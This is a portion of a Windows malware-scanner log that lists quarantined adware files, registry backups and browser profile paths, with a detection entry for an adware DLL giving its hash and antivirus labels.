         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.5s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.5s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.6s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.6s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.7s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.7s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.8s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.9s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          0.9s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.0s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.4s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.4s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
      Size . . . . . . . : 248.320 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.6
      SHA-256  . . . . . : 4D9A03EE1BE889ECA4F57296073691513350B540A22E5CCC60B7442A95DEFC4A
      Version  . . . . . : 1.0.0.27567
    > Bitdefender  . . . : Adware.Generic.1693800
    > Kaspersky  . . . . : not-a-virus:AdWare.Win32.AdAgent.je
    > HitmanPro  . . . . : App/Generic-CK
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.1s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.9s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.9s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.7s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
